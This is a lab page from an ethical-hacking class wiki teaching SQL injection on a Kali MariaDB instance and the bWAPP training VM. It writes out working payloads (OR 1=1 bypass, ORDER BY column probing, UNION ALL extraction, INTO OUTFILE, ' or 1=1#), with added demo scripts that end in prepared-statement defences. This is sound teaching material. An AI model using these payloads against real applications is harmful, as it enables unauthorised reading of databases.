Class 11 Lab 2 - SQL Injection - Justin-Boyd/Ethical-Hacking-Class GitHub Wiki

Task 1: SQL Injection Logic

Step 1

  • Make sure Kali is running.

Step 2

  • Start the MariaDB service, connect to it as root, and switch to the database called cyber. Type toor when the client asks for the password.
service mysql start
mysql -u root -p
toor
use cyber ;

Step 3

  • Show only the row with an ID value of 1.
select * from attackers where id=1 ;

Step 4

  • Try to display a non-existing value using the where statement (the table has no row with a negative ID).
  • If it does not exist, the output will be an empty set (0.000 sec).
select * from attackers where id=-1 ;

Step 5

  • Enumerate the attackers table using a non-existing ID in a where statement and bypass it using OR. Because or 1=1 is true for every row, the whole table is returned even though id=-1 matches nothing.
select * from attackers where id=-1 or 1=1 ;

Step 6

  • Use ORDER BY to enumerate the number of columns. ORDER BY n sorts the result by its n-th column; if n is larger than the number of columns the server rejects the query (Unknown column 'n' in 'order clause'). A hacker therefore raises n one step at a time until the error appears and deduces the column count via trial and error. Here all five positions succeed, so attackers has at least five columns, and order by 6 fails, so it has exactly five (which is why the UNION in Step 7 supplies five values).
select * from attackers order by 1,2,3,4,5 ;
select * from attackers order by 6 ;

Step 7

  • Use UNION ALL to get the version, user, and database name; these are MariaDB functions, so each call ends with (). UNION (or UNION ALL, which also keeps duplicate rows) appends the rows of a second SELECT to the output of the first, provided both produce the same number of columns. With this method a hacker can place an arbitrary value or function result in every column position of the second SELECT and read it back in the application's normal output. The condition where id=-1 empties the first SELECT so that only the injected row is shown.
select * from attackers where id=-1 union all select version(),user(),database(),4,5 ;

Step 8

  • Output the data of the attackers table to a file.
  • into outfile makes the server write the result set to a file on the database host. The file is created by the mysqld process, not by the client, so the connecting user needs the FILE privilege, the path must be permitted by the secure_file_priv setting, and the file must not already exist.
  • Leave the MariaDB shell (type exit or press Ctrl + D) and read the file.
select * from attackers into outfile '/tmp/database.txt' ;
exit
cat /tmp/database.txt
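The whole of Task 1 as one runnable MariaDB script, added here as an example and not part of the original lab. It builds its own throwaway cyber_demo database with a constructed five-column attackers table (the lab's real cyber.attackers table is only assumed to have five columns with an integer id, as the five-value UNION in Step 7 implies), runs the Step 3 to 7 queries in order, and ends with a prepared-statement version of the lookup against which the same payload does nothing. Run it as mysql -u root -p --force < task1_demo.sql so the deliberately failing ORDER BY 6 probe does not stop the script; the INTO OUTFILE step is left out because it depends on the FILE privilege and secure_file_priv of the particular server.

```sql
-- Added example (not the lab's own data): a throwaway copy of the scenario.
-- The real cyber.attackers table is only assumed to have five columns with
-- an integer id; the rows below are constructed for the demo.
CREATE DATABASE IF NOT EXISTS cyber_demo;
USE cyber_demo;
DROP TABLE IF EXISTS attackers;
CREATE TABLE attackers (
  id        INT PRIMARY KEY,
  handle    VARCHAR(32),
  country   VARCHAR(32),
  ip        VARCHAR(15),
  last_seen DATE
);
INSERT INTO attackers VALUES
  (1, 'mallory', 'XX', '203.0.113.10', '2020-01-05'),
  (2, 'trudy',   'YY', '198.51.100.7', '2020-02-11'),
  (3, 'eve',     'ZZ', '192.0.2.44',   '2020-03-19');

-- Steps 3 and 4: an existing id returns its row, a non-existing id nothing.
SELECT * FROM attackers WHERE id = 1;
SELECT * FROM attackers WHERE id = -1;          -- Empty set

-- Step 5: "OR 1=1" makes the WHERE clause true for every row, so the
-- non-existing id no longer restricts the output.
SELECT * FROM attackers WHERE id = -1 OR 1=1;   -- all three rows

-- Step 6: ORDER BY n sorts by the n-th column. It works while n is within
-- the column count and fails one past it, which gives the count away.
SELECT * FROM attackers ORDER BY 5;             -- works: at least 5 columns
SELECT * FROM attackers ORDER BY 6;             -- ERROR 1054: Unknown column '6' in 'order clause'

-- Step 7: with the count known, UNION ALL a second SELECT that has the same
-- number of values. The empty first SELECT (id = -1) leaves only the
-- injected row, whose columns carry the function results.
SELECT * FROM attackers WHERE id = -1
UNION ALL
SELECT version(), user(), database(), 4, 5;    -- database() is cyber_demo here

-- Defence: bind the value instead of splicing it into the SQL text. The
-- whole payload arrives as one parameter; MariaDB compares id with the
-- numeric prefix of the string (-1, with a truncation warning) and no row
-- matches, so the "OR 1=1" never becomes part of the query.
PREPARE by_id FROM 'SELECT * FROM attackers WHERE id = ?';
SET @wanted = '-1 OR 1=1';
EXECUTE by_id USING @wanted;                    -- Empty set
DEALLOCATE PREPARE by_id;

DROP DATABASE cyber_demo;
```

The ORDER BY probe is what a blind attacker does when the column count is unknown: the first failing n tells them how many values the UNION must carry. The prepared statement at the end is the fix that Steps 5 and 7 are really demonstrating the absence of: the application must pass the ID as a parameter, never as text pasted into the query string.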

Task 2: SQL Injection Practice

Step 1

  • Turn on the bWAPP VM.

Step 2

  • Log in to bWAPP on bee-box and choose the SQL Injection (GET/Search) challenge.

Step 3

  • Create an error in the search query (expect an SQL error to appear instead of the standard search output). Use a single quote ' to create the error: the search term is placed inside a quoted string in the application's query, so an extra quote closes that string early and leaves the rest of the query syntactically invalid.

Step 4

  • Try to get all available results with a true statement by using the input ' or 1=1#. The quote closes the string the search term sits in, or 1=1 is true for every row, and # turns the remainder of the original query into a comment so that it no longer causes a syntax error.
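What the two inputs do to the search query, as an added example that is not bWAPP's own code: the GET/Search page is assumed to paste the search term unescaped into a LIKE pattern of the form title LIKE '%<input>%', and the movies table and rows below are constructed for the demo. Run it with mysql -u root -p < task2_demo.sql on the Kali MariaDB instance (not on bee-box).

```sql
-- Added example (not bWAPP's code). Assumed application query:
--   SELECT * FROM movies WHERE title LIKE '%<input>%'
-- with <input> pasted in unescaped. Table and rows are constructed.
CREATE DATABASE IF NOT EXISTS bwapp_demo;
USE bwapp_demo;
DROP TABLE IF EXISTS movies;
CREATE TABLE movies (id INT PRIMARY KEY, title VARCHAR(64), release_year INT);
INSERT INTO movies VALUES
  (1, 'Iron Man',     2008),
  (2, 'The Matrix',   1999),
  (3, 'Blade Runner', 1982);

-- Normal use, input = man: one row (LIKE is case-insensitive by default).
SELECT * FROM movies WHERE title LIKE '%man%';

-- Step 3, input = a lone single quote. The query becomes
--   SELECT * FROM movies WHERE title LIKE '%'%';
-- and the server answers with ERROR 1064 "You have an error in your SQL
-- syntax". It is left as a comment here because the unbalanced quote would
-- swallow the rest of this script in the mysql client.

-- Step 4, input = ' or 1=1#. The quote closes the pattern, OR 1=1 is true
-- for every row, and # comments out the trailing %' so the statement is
-- valid again. Because # runs to the end of the line, the terminating ;
-- has to sit on the next line here.
SELECT * FROM movies WHERE title LIKE '%' OR 1=1#%'
;
-- all three rows are returned

-- The same input against a parameterised query: the pattern is built
-- server-side with CONCAT and the raw input is bound as one value, so the
-- quote and the # are just characters to search for.
PREPARE find_title FROM 'SELECT * FROM movies WHERE title LIKE CONCAT(''%'', ?, ''%'')';
SET @q = ''' or 1=1#';
EXECUTE find_title USING @q;   -- Empty set
DEALLOCATE PREPARE find_title;

DROP DATABASE bwapp_demo;
```

The difference from Task 1 is the context: there the injected value landed in a numeric comparison and needed no quote, here it lands inside a string literal, so the payload must first close that literal and then neutralise whatever follows it, which is the job of the # comment.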